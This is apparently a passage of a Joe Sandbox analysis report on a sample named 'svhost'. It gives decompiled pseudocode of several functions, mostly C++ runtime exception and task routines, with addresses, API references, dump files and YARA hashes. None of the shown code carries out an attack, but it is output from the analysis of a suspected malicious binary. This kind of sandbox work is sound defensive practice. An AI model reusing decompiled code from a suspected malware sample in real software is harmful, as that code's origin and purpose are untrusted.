					_t45 =  *0xee52e0; // 0xee5284
					E00E633C0(_t49,  &_v44, _t74, _t75,  *(_t45 + ((_v45 & 0x000000ff) >> 4)) & 0x000000ff);
					_t47 =  *0xee52e0; // 0xee5284
					E00E633C0(_t49,  &_v44, _t74, _t75,  *(_t47 + (_v45 & 0xf)) & 0x000000ff);
					_v52 = _v52 + 1;
				}
				E00E57F70(_a4, E00E51650( &_v44));
				E00E57F50( &_v44);
				_t27 =  &_v16; // 0xe620e3
				 *[fs:0x0] =  *_t27;
				return E00E89A35(_t49, _v20 ^ _t76,  &_v44, _t74, _t75);
			}















                                      0x00e62190
                                      0x00e62190
                                      0x00e62190
                                      0x00e62193
                                      0x00e62195
                                      0x00e621a0
                                      0x00e621a4
                                      0x00e621a9
                                      0x00e621ab
                                      0x00e621ae
                                      0x00e621af
                                      0x00e621b2
                                      0x00e621b8
                                      0x00e621bb
                                      0x00e621c3
                                      0x00e621c9
                                      0x00e621d7
                                      0x00e621dc
                                      0x00e621ee
                                      0x00e621f6
                                      0x00e621fd
                                      0x00e62207
                                      0x00e62211
                                      0x00e6221e
                                      0x00e6222a
                                      0x00e62237
                                      0x00e621eb
                                      0x00e621eb
                                      0x00e6224e
                                      0x00e62256
                                      0x00e6225e
                                      0x00e62261
                                      0x00e62276

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task
                                      • String ID: $
                                      • API String ID: 1384045349-618146705
                                      • Opcode ID: c377881260c3a0bd0f1091c274caaed82e153c605beab0222bda9c7f4ce672f5
                                      • Instruction ID: f944d660c27c3238b5b67e9ee258dc571610fdc3d5a7e16a317c528ab2b7454b
                                      • Opcode Fuzzy Hash: c377881260c3a0bd0f1091c274caaed82e153c605beab0222bda9c7f4ce672f5
                                      • Instruction Fuzzy Hash: 96216071944158AFCB05EFA4E891EEEBBB5FF08310F045569F5567B291DF306A04CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E58E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E00E58E60(intOrPtr __ecx) {
				char _v16;
				char _v18;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t26;
				void* _t35;
				signed int _t61;
				void* _t62;
				void* _t63;

				_push(0xffffffff);
				_push(0xec0670);
				_push( *[fs:0x0]);
				_t63 = _t62 - 0x14;
				_t26 =  *0xeef074; // 0x221cac15
				_push(_t26 ^ _t61);
				 *[fs:0x0] =  &_v16;
				_v28 = __ecx;
				E00E595B0(_v28);
				_v24 = E00E51100(_v28);
				_t6 =  &_v24; // 0xe57b4f
				if((E00E59F80( *_t6) & 0x000000ff) != 0) {
					_t7 =  &_v24; // 0xe57b4f
					_v36 =  *((intOrPtr*)( *_t7));
					_v32 = E00E56580(_v28);
					_t11 =  &_v24; // 0xe57b4f
					_push(E00E51650( *_t11));
					_push(_v32);
					E00E524A0(_t38);
					_t63 = _t63 + 0xc;
					_t13 =  &_v24; // 0xe57b4f
					E00E5A150(_v32, _v36,  *((intOrPtr*)( *_t13 + 0x14)) + 1);
				}
				_t17 =  &_v24; // 0xe57b4f
				 *((intOrPtr*)( *_t17 + 0x10)) = 0;
				_t19 =  &_v24; // 0xe57b4f
				 *((intOrPtr*)( *_t19 + 0x14)) = 7;
				_v18 = 0;
				_t23 =  &_v24; // 0xe57b4f
				_t35 = E00E5A0A0(0 +  *_t23,  &_v18);
				 *[fs:0x0] = _v16;
				return _t35;
			}














                                      0x00e58e63
                                      0x00e58e65
                                      0x00e58e70
                                      0x00e58e71
                                      0x00e58e74
                                      0x00e58e7b
                                      0x00e58e7f
                                      0x00e58e85
                                      0x00e58e8b
                                      0x00e58e98
                                      0x00e58e9b
                                      0x00e58ea8
                                      0x00e58eaa
                                      0x00e58eaf
                                      0x00e58eba
                                      0x00e58ebd
                                      0x00e58ec9
                                      0x00e58ecd
                                      0x00e58ece
                                      0x00e58ed3
                                      0x00e58ed6
                                      0x00e58ee7
                                      0x00e58ee7
                                      0x00e58eec
                                      0x00e58eef
                                      0x00e58ef6
                                      0x00e58ef9
                                      0x00e58f02
                                      0x00e58f12
                                      0x00e58f16
                                      0x00e58f21
                                      0x00e58f2c

                                      APIs
                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00E58E8B
                                      • allocator.LIBCPMTD ref: 00E58EE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Base::Concurrency::details::ContextIdentityQueueWorkallocator
                                      • String ID: O{
                                      • API String ID: 2135583291-3566007747
                                      • Opcode ID: 209ae22af78de41667c448ecf205f35b96c0393faa52449ce67b375440007648
                                      • Instruction ID: 862f3557485010034d69674f3aa582111d7fbfc8118d6308d616421d83b02d73
                                      • Opcode Fuzzy Hash: 209ae22af78de41667c448ecf205f35b96c0393faa52449ce67b375440007648
                                      • Instruction Fuzzy Hash: F9213CB1E001099BCB08EFA4D942BAFB7F5FB48305F104569E905B7391EB35A904CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E56C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00E56C40(void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v20;
				void* __ecx;
				signed int _t28;
				char _t38;
				signed int _t53;

				_push(0xffffffff);
				_push(0xec04f6);
				_push( *[fs:0x0]);
				_push(_t38);
				_t28 =  *0xeef074; // 0x221cac15
				_push(_t28 ^ _t53);
				 *[fs:0x0] =  &_v16;
				_v20 = _t38;
				_t3 =  &_v20; // 0xe5e433
				 *((intOrPtr*)( *_t3)) = 0xee517c;
				_t4 =  &_v20; // 0xe5e433
				 *((intOrPtr*)( *_t4 + 4)) = 1;
				E00E51390();
				_v8 = 0;
				_t8 =  &_v20; // 0xe5e433
				E00E52200( *_t8 + 0x14);
				_v8 = 1;
				_t10 =  &_v20; // 0xe5e433
				E00E52220( *_t10 + 0x44);
				_t11 =  &_v20; // 0xe5e433
				 *((char*)( *_t11 + 0x6c)) = 0;
				_t13 =  &_v20; // 0xe5e433
				 *((intOrPtr*)( *_t13 + 0x70)) = 0;
				_t15 =  &_v20; // 0xe5e433
				 *((char*)( *_t15 + 0x74)) = 0;
				_t17 =  &_v20; // 0xe5e433
				 *((char*)( *_t17 + 0x75)) = 0;
				_t19 =  &_v20; // 0xe5e433
				 *((char*)( *_t19 + 0x76)) = 0;
				_t21 =  &_v20; // 0xe5e433
				 *((intOrPtr*)( *_t21 + 0x78)) = _a4;
				_v8 = 0xffffffff;
				_t25 =  &_v20; // 0xe5e433
				 *[fs:0x0] = _v16;
				return  *_t25;
			}










                                      0x00e56c43
                                      0x00e56c45
                                      0x00e56c50
                                      0x00e56c51
                                      0x00e56c52
                                      0x00e56c59
                                      0x00e56c5d
                                      0x00e56c63
                                      0x00e56c66
                                      0x00e56c69
                                      0x00e56c6f
                                      0x00e56c72
                                      0x00e56c7f
                                      0x00e56c84
                                      0x00e56c8b
                                      0x00e56c91
                                      0x00e56c96
                                      0x00e56c9a
                                      0x00e56ca0
                                      0x00e56ca5
                                      0x00e56ca8
                                      0x00e56cac
                                      0x00e56caf
                                      0x00e56cb6
                                      0x00e56cb9
                                      0x00e56cbd
                                      0x00e56cc0
                                      0x00e56cc4
                                      0x00e56cc7
                                      0x00e56ccb
                                      0x00e56cd1
                                      0x00e56cd4
                                      0x00e56cdb
                                      0x00e56ce1
                                      0x00e56cec

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56C7F
                                        • Part of subcall function 00E52200: std::_Mutex_base::_Mutex_base.LIBCONCRTD ref: 00E5220C
                                      • std::condition_variable::condition_variable.LIBCONCRTD ref: 00E56CA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Mutex_baseMutex_base::_std::_std::condition_variable::condition_variablestd::exception_ptr::exception_ptr
                                      • String ID: 3
                                      • API String ID: 12386501-3930663615
                                      • Opcode ID: dc4546cfe475a2998e03937fb638744beb0b251f3a38289a076cfe3267bbd8e2
                                      • Instruction ID: fc76ac4f9bf8ac15567adae5cd699b3953c9219c8a1aaa30d31444db5c990f05
                                      • Opcode Fuzzy Hash: dc4546cfe475a2998e03937fb638744beb0b251f3a38289a076cfe3267bbd8e2
                                      • Instruction Fuzzy Hash: B221FCB4904259DFDB04DF98C850BAFBBF4FB45314F10469CE8216B392C775A905CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E724A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00E724A0(void* __eflags, char _a4) {
				char _v24;

				_t1 =  &_a4; // 0xe5686b
				_t6 =  *_t1;
				_t11 =  &_v24;
				E00E72408( &_v24,  *((intOrPtr*)( *_t1)),  *((intOrPtr*)(_t6 + 4)));
				E00EA0C81( &_v24, 0xeead54);
				asm("int3");
				return E00E54EB0(_t11,  *((intOrPtr*)(_t11 + 0xc)));
			}




                                      0x00e724a3
                                      0x00e724a3
                                      0x00e724a6
                                      0x00e724b1
                                      0x00e724bf
                                      0x00e724c4
                                      0x00e724ce

                                      APIs
                                      • std::future_error::future_error.LIBCPMT ref: 00E724B1
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E724BF
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::future_error::future_error
                                      • String ID: kh
                                      • API String ID: 1079043900-2724299894
                                      • Opcode ID: 78ec3d3904aae0c99a5ad0074d9c320bcd785c6389ddf887eb09a57c601a0deb
                                      • Instruction ID: af43d1e043c48a720400f502d843efa10de4ff77f9bf76391fd2eb88937f4f49
                                      • Opcode Fuzzy Hash: 78ec3d3904aae0c99a5ad0074d9c320bcd785c6389ddf887eb09a57c601a0deb
                                      • Instruction Fuzzy Hash: 9DD0127140010D9A8B01FB94D906C997BEAAB04305B209454B9053A562DB21F9599652
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E72801 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00E72801(intOrPtr _a4) {
				char _v16;

				E00E51AE0( &_v16, _a4);
				E00EA0C81( &_v16, 0xeeda64);
				asm("int3");
				return "bad function call";
			}




                                      0x00e7280d
                                      0x00e7281b
                                      0x00e72820
                                      0x00e72826

                                      APIs
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                      • String ID: bad function call
                                      • API String ID: 1843230569-3612616537
                                      • Opcode ID: 19df2972b7324e32b8a4698aff4d9438d806486ce2e3c59fcf83831ff1ce8807
                                      • Instruction ID: e819569bec684e80aeb321b97a8b084cc965ac14ea167886965025e311615f1b
                                      • Opcode Fuzzy Hash: 19df2972b7324e32b8a4698aff4d9438d806486ce2e3c59fcf83831ff1ce8807
                                      • Instruction Fuzzy Hash: 2FC01278D0820C77CF00FAE4D917D8D77BC5A04340B806564BD24B7085DAB0A71D86C4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E53660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E53660() {
				char _v16;

				E00E52560( &_v16, "This function cannot be called on a default constructed task");
				return E00EA0C81( &_v16, 0xeedb2c);
			}




                                      0x00e5366e
                                      0x00e53684

                                      APIs
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E5366E
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5367C
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      • This function cannot be called on a default constructed task, xrefs: 00E53666
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                      • String ID: This function cannot be called on a default constructed task
                                      • API String ID: 1843230569-3567850458
                                      • Opcode ID: 6c69a0ccd85c714d391eb674009446ddecd0a3936eedce7f5f3de453b2734c3b
                                      • Instruction ID: 6efb3ab381d44dc485fa48ba9392be1073e076f069fb47d1efb3a857b824d875
                                      • Opcode Fuzzy Hash: 6c69a0ccd85c714d391eb674009446ddecd0a3936eedce7f5f3de453b2734c3b
                                      • Instruction Fuzzy Hash: D2C01236E4430C62CA00F6A0AD03999B3AC9911700B4022A9BE147A282BAE17A1982D6
                                      Uniqueness

                                      Uniqueness Score: -1.00%